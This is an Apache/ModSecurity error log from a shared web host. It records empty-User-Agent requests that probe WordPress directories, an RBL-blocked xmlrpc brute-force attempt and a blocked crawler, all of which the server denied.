[Tue May 26 16:41:28.831032 2026] [security2:error] [pid 817651:tid 817894] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/php/"] [unique_id "ahV_4NlGRCPPN1dS2y2qCQAAAPY"]
[Tue May 26 16:41:29.063165 2026] [autoindex:error] [pid 817651:tid 817871] [client 89.117.104.6:37346] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:29.063901 2026] [security2:error] [pid 817651:tid 817871] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_4NlGRCPPN1dS2y2qEgAAAN8"]
[Tue May 26 16:41:29.193989 2026] [security2:error] [pid 823496:tid 823740] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_3pa08mrtyBNpA4PCUAAAAHA"]
[Tue May 26 16:41:29.289346 2026] [security2:error] [pid 817651:tid 817845] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/themes/twentytwenty/index.php"] [unique_id "ahV_4dlGRCPPN1dS2y2qGQAAAMU"]
[Tue May 26 16:41:29.289696 2026] [security2:error] [pid 817651:tid 817861] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/themes/twentytwenty/"] [unique_id "ahV_4dlGRCPPN1dS2y2qFwAAANU"]
[Tue May 26 16:41:29.673180 2026] [autoindex:error] [pid 817651:tid 817890] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-content/cache/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:29.673850 2026] [security2:error] [pid 817651:tid 817890] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_4dlGRCPPN1dS2y2qHgAAAPI"]
[Tue May 26 16:41:29.674308 2026] [security2:error] [pid 817651:tid 817792] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/cache/"] [unique_id "ahV_4dlGRCPPN1dS2y2qHAAAAJA"]
[Tue May 26 16:41:29.977873 2026] [autoindex:error] [pid 817651:tid 817906] [client 89.117.104.6:37354] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-admin/maint/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:29.978607 2026] [security2:error] [pid 817651:tid 817906] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_4dlGRCPPN1dS2y2qIQAAAQI"]
[Tue May 26 16:41:29.995737 2026] [security2:error] [pid 817651:tid 817833] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_39lGRCPPN1dS2y2p7AAAALk"]
[Tue May 26 16:41:30.254820 2026] [security2:error] [pid 817651:tid 817804] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_4tlGRCPPN1dS2y2qKAAAAJw"]
[Tue May 26 16:41:30.254860 2026] [security2:error] [pid 817651:tid 817804] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_4tlGRCPPN1dS2y2qKAAAAJw"]
[Tue May 26 16:41:30.258490 2026] [security2:error] [pid 817651:tid 817857] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/akismet/"] [unique_id "ahV_4tlGRCPPN1dS2y2qJwAAANE"]
[Tue May 26 16:41:30.373136 2026] [security2:error] [pid 817651:tid 817842] [client 222.253.86.224:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_39lGRCPPN1dS2y2p8QAAAMI"]
[Tue May 26 16:41:30.617301 2026] [autoindex:error] [pid 823496:tid 823744] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/assets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:30.617942 2026] [security2:error] [pid 823496:tid 823744] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_4pa08mrtyBNpA4PCfwAAAHQ"]
[Tue May 26 16:41:30.618299 2026] [security2:error] [pid 817651:tid 817782] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/assets/"] [unique_id "ahV_4tlGRCPPN1dS2y2qLAAAAIY"]
[Tue May 26 16:41:30.788783 2026] [security2:error] [pid 823496:tid 823681] [client 64.233.173.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.com"] [uri "/index.php"] [unique_id "ahV_4pa08mrtyBNpA4PCeQAAADU"]
[Tue May 26 16:41:30.818893 2026] [autoindex:error] [pid 823496:tid 823749] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:30.819691 2026] [security2:error] [pid 823496:tid 823749] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_4pa08mrtyBNpA4PChgAAAHk"]
[Tue May 26 16:41:30.820093 2026] [security2:error] [pid 817651:tid 817851] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/block-patterns/"] [unique_id "ahV_4tlGRCPPN1dS2y2qMQAAAMs"]
[Tue May 26 16:41:31.012686 2026] [security2:error] [pid 823496:tid 823699] [client 117.198.37.168:53378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_45a08mrtyBNpA4PCiQAAAEc"]
[Tue May 26 16:41:31.012817 2026] [security2:error] [pid 823496:tid 823699] [client 117.198.37.168:53378] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV_45a08mrtyBNpA4PCiQAAAEc"]
[Tue May 26 16:41:31.020604 2026] [autoindex:error] [pid 817651:tid 817799] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:31.021312 2026] [security2:error] [pid 817651:tid 817799] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_49lGRCPPN1dS2y2qOwAAAJc"]
[Tue May 26 16:41:31.021792 2026] [security2:error] [pid 817651:tid 817850] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/block-supports/"] [unique_id "ahV_49lGRCPPN1dS2y2qOQAAAMo"]
[Tue May 26 16:41:31.202567 2026] [autoindex:error] [pid 817651:tid 817783] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/html-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:31.203206 2026] [security2:error] [pid 817651:tid 817783] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_49lGRCPPN1dS2y2qPgAAAIc"]
[Tue May 26 16:41:31.203713 2026] [security2:error] [pid 817651:tid 817872] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/html-api/"] [unique_id "ahV_49lGRCPPN1dS2y2qPQAAAOA"]
[Tue May 26 16:41:31.434744 2026] [autoindex:error] [pid 823496:tid 823732] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:31.435419 2026] [security2:error] [pid 823496:tid 823732] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_45a08mrtyBNpA4PCjwAAAGg"]
[Tue May 26 16:41:31.435977 2026] [security2:error] [pid 817651:tid 817863] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/js/"] [unique_id "ahV_49lGRCPPN1dS2y2qQAAAANc"]
[Tue May 26 16:41:31.708768 2026] [autoindex:error] [pid 817651:tid 817809] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/php-compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:31.709422 2026] [security2:error] [pid 817651:tid 817809] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_49lGRCPPN1dS2y2qSQAAAKE"]
[Tue May 26 16:41:31.709887 2026] [security2:error] [pid 817651:tid 817793] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/php-compat/"] [unique_id "ahV_49lGRCPPN1dS2y2qRwAAAJE"]
[Tue May 26 16:41:31.923521 2026] [autoindex:error] [pid 823496:tid 823674] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:31.924193 2026] [security2:error] [pid 823496:tid 823674] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_45a08mrtyBNpA4PCoQAAAC4"]
[Tue May 26 16:41:31.931545 2026] [security2:error] [pid 817651:tid 817879] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/PHPMailer/"] [unique_id "ahV_49lGRCPPN1dS2y2qSwAAAOc"]
[Tue May 26 16:41:32.120767 2026] [autoindex:error] [pid 817651:tid 817833] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:32.121447 2026] [security2:error] [pid 817651:tid 817833] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_5NlGRCPPN1dS2y2qVAAAALk"]
[Tue May 26 16:41:32.121926 2026] [security2:error] [pid 817651:tid 817867] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/pomo/"] [unique_id "ahV_5NlGRCPPN1dS2y2qUgAAANs"]
[Tue May 26 16:41:32.326264 2026] [security2:error] [pid 823496:tid 823742] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_4Za08mrtyBNpA4PCdAAAAHI"]
[Tue May 26 16:41:32.360266 2026] [security2:error] [pid 823496:tid 823644] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_5Ja08mrtyBNpA4PCqgAAABA"]
[Tue May 26 16:41:32.360306 2026] [security2:error] [pid 823496:tid 823644] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_5Ja08mrtyBNpA4PCqgAAABA"]
[Tue May 26 16:41:32.361133 2026] [security2:error] [pid 817651:tid 817806] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/random_compat/"] [unique_id "ahV_5NlGRCPPN1dS2y2qVgAAAJ4"]
[Tue May 26 16:41:32.594410 2026] [autoindex:error] [pid 823496:tid 823702] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:32.595121 2026] [security2:error] [pid 823496:tid 823702] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_5Ja08mrtyBNpA4PCqwAAAEo"]
[Tue May 26 16:41:32.595586 2026] [security2:error] [pid 817651:tid 817824] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/rest-api/"] [unique_id "ahV_5NlGRCPPN1dS2y2qVwAAALA"]
[Tue May 26 16:41:32.825572 2026] [autoindex:error] [pid 823496:tid 823686] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:32.826371 2026] [security2:error] [pid 823496:tid 823686] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_5Ja08mrtyBNpA4PCswAAADo"]
[Tue May 26 16:41:32.829875 2026] [security2:error] [pid 817651:tid 817801] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/sitemaps/"] [unique_id "ahV_5NlGRCPPN1dS2y2qWwAAAJk"]
[Tue May 26 16:41:33.044516 2026] [autoindex:error] [pid 817651:tid 817825] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:33.045717 2026] [security2:error] [pid 817651:tid 817825] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_5dlGRCPPN1dS2y2qYgAAALE"]
[Tue May 26 16:41:33.049411 2026] [security2:error] [pid 817651:tid 817895] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/sodium_compat/"] [unique_id "ahV_5NlGRCPPN1dS2y2qXwAAAPc"]
[Tue May 26 16:41:33.288686 2026] [autoindex:error] [pid 823496:tid 823755] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/style-engine/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:33.289406 2026] [security2:error] [pid 823496:tid 823755] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_5Za08mrtyBNpA4PCvwAAAH8"]
[Tue May 26 16:41:33.289827 2026] [security2:error] [pid 817651:tid 817781] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/style-engine/"] [unique_id "ahV_5dlGRCPPN1dS2y2qZAAAAIU"]
[Tue May 26 16:41:33.666731 2026] [security2:error] [pid 823496:tid 823750] [client 110.249.201.161:15602] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahV_5Za08mrtyBNpA4PCxwAAAHo"]
[Tue May 26 16:41:33.675834 2026] [security2:error] [pid 823496:tid 823634] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_45a08mrtyBNpA4PCkQAAAAY"]
[Tue May 26 16:41:33.718425 2026] [autoindex:error] [pid 817651:tid 817820] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:41:33.719114 2026] [security2:error] [pid 817651:tid 817820] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/cgi-sys/403.html"] [unique_id "ahV_5dlGRCPPN1dS2y2qZwAAAKw"]
[Tue May 26 16:41:33.719576 2026] [security2:error] [pid 817651:tid 817899] [client 89.117.104.6:37354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.srsglobalsoft.com"] [uri "/wp-includes/theme-compat/"] [unique_id "ahV_5dlGRCPPN1dS2y2qZgAAAPs"]
[Tue May 26 16:41:33.911896 2026] [autoindex:error] [pid 823496:tid 823709] [client 89.117.104.6:0] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
